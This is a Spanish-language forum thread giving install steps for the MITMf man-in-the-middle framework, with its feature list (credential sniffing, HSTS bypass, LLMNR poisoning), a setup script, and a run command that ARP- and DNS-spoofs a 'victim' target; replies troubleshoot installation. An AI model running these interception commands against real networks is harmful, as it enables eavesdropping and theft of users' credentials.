Underc0de

Hola mis colegas del foro hoy les vengo un tutorial que encontre escasamente.

Mucho bla bla comenzemos el post

El proyecto esta disponible en github y en apt usaremos las dos formas para instalarlo
Nota:Se usaran entornos , y derivvados como debian y ubuntu , se ah testeado en linux mint,debian,kali linux , y sus derivados , tambien esta disponible en arch linux y derivados .

Caracteristicas
Features

    The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
    As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
    The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
    MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
    Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

El MITMF se usa para saltar o defeat HSTS que trae los nuevo navegadores .
Github https://github.com/byt3bl33d3r/MITMf (https://github.com/byt3bl33d3r/MITMf)
ArcLinux: https://aur.archlinux.org/packages/mitmf-git/ (https://aur.archlinux.org/packages/mitmf-git/)
Hay algunas dependecia que se ocupan instalar para que su funcionamiento sea productivo y le funciones cuyo adelante pondre los commandos
Script Github:
https://github.com/CiuffysHub/MITMf (https://github.com/CiuffysHub/MITMf)
git clone https://github.com/CiuffysHub/MITMf

cd MITMf

chmod 777 setup-fixed.sh

./setup-fixed.sh

Instalando dependecias

apt-get install python-pypcap
pip2 install watchdog
pip2 install dsnlib

Script Setup-fixed.sh

GNU nano 2.2.6                                    File: setup-fixed.sh                                                                    Modified 

#!/usr/bin/env bash
#In case you do not have pip utility and setuptools installed
apt-get install python-pip
#In case your system is old: apt-get update && apt-get dist-upgrade
#If you are still missing some of these python packages, install them by using pip.
echo -e "\e[31mRunning Git Submodule Setup...\e[0m"
git submodule init && git submodule update --recursive
echo -e "\e[31mInstalling Recommended packages...\e[0m"
apt-get install -y python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev
echo -e "\e[31mInstalling Capstone, Twisted, Requests, Scapy, Dnspython, Cryptography, Crypto...\e[0m"
apt-get install -y python-crypto python-twisted python-requests python-scapy python-dnspython python-cryptography python-capstone
echo -e "\e[31mInstalling Msgpack, Configobj, Pefile, Ipy, Openssl, Pypcap...\e[0m"
apt-get install -y python-configobj python-pefile python-ipy python-openssl python-pypcap python-msgpack
#git clone https://github.com/kti/python-netfilterqueue.git
#python python-netfilterqueue/setup.py install
echo -e "\e[31mRunning Mitmflib Setup...\e[0m"
(cd mitmflib-0.18.4 && python setup.py install)

Otra forma de instalar MITMF

Instalando Dependecias

Arch LInux

pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo

Debian , Ubuntu (Derivados)

apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml

Instalando MITMf

Note:Si usas Arch Linux utiliza en vez de pip a pip2

    Install virtualenvwrapper:

pip install virtualenvwrapper

    Edit your .bashrc or .zshrc file to source the virtualenvwrapper.sh script:

source /usr/bin/virtualenvwrapper.sh

The location of this script may vary depending on your Linux distro

    Restart your terminal or run:

source /usr/bin/virtualenvwrapper.sh

    Create your virtualenv:

mkvirtualenv MITMf -p /usr/bin/python2.7

    Clone the MITMf repository:

git clone https://github.com/byt3bl33d3r/MITMf

    cd into the directory, initialize and clone the repos submodules:

cd MITMf && git submodule init && git submodule update --recursive


Install the dependencies:

pip install -r requirements.txt

python mitmf.py --help

Cualquier forma de instalacion funciona , esta misma forma tambien funciona para archi linux ya testeado

Ejecutando MITMF
python mitmf.py

./mitmf.py -i wlan0 -l 53 --spoof --hsts --arp --dns --gateway 192.168.1.1 --target 192.168.0.1

--gateway: Es la ip del router
--target:    La victima
-- i : Es la interfaz comunmente es wlan0 para wireless y eth0 para targeta de red
Nota en version derivada los nombre de wlan0 o eth0 cambian lo puede ver ejecutando
ifconfig

Puede sniffear red lan , red lan wireless ,mobile devices , SALTANDO EL HTTPS mas informacion leer caracterisicas de MITMF

Gracias por este fabuloso tutorial . Pero hay otra manera más sencilla , en todo cosa para mi qué es la siguiente : Instalar los repositorios de kali , y luego ejecutar "sudo apt-get install mitmf".

Un saludo .

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Gracias por este fabuloso tutorial . Pero hay otra manera más sencilla , en todo cosa para mi qué es la siguiente : Instalar los repositorios de kali , y luego ejecutar "sudo apt-get install mitmf".

Un saludo .

Tengo entendido que te instala una versión mas antigua ¿no?
¿Cuales repositorios para Kali recomiendas?

Muy buen tutorial, Gracias!

En kali te instala la version 0.9.7 y la mas actual es la 0.9.8, habrá que checar bien el changelog para ver si tiene mucha diferencia entre versiones.

Yo sigo sin conseguir instalar MITMf. Llegado a cierto punto me salen excepciones en rojo, y no puedo seguir. Y cuando intento ejecutar MITMf me aparecen varios errores.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Yo sigo sin conseguir instalar MITMf. Llegado a cierto punto me salen excepciones en rojo, y no puedo seguir. Y cuando intento ejecutar MITMf me aparecen varios errores.

Si quieres que te ayudemos, deberías poner una captura o los errores que te aparecen.

Saludos,

Blackdrake

Buenas de nuevo. Peleando con la terminal (soy muy novato) he llegado hasta aquí:

(mitmf)jose@jose-Not-Specified:~/MITMf$ python mitmf.py
Traceback (most recent call last):
  File "mitmf.py", line 30, in <module>
    import core.responder.settings as settings
  File "/home/jose/MITMf/core/responder/settings.py", line 24, in <module>
    from core.configwatcher import ConfigWatcher
  File "/home/jose/MITMf/core/configwatcher.py", line 21, in <module>
    from mitmflib.watchdog.observers import Observer
ImportError: No module named mitmflib.watchdog.observers


¿Qué tengo que hacer? Gracias!

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Buenas de nuevo. Peleando con la terminal (soy muy novato) he llegado hasta aquí:

(mitmf)jose@jose-Not-Specified:~/MITMf$ python mitmf.py
Traceback (most recent call last):
  File "mitmf.py", line 30, in <module>
    import core.responder.settings as settings
  File "/home/jose/MITMf/core/responder/settings.py", line 24, in <module>
    from core.configwatcher import ConfigWatcher
  File "/home/jose/MITMf/core/configwatcher.py", line 21, in <module>
    from mitmflib.watchdog.observers import Observer
ImportError: No module named mitmflib.watchdog.observers


¿Qué tengo que hacer? Gracias!

Has probado ejecutándolo con sudo?

Saludos.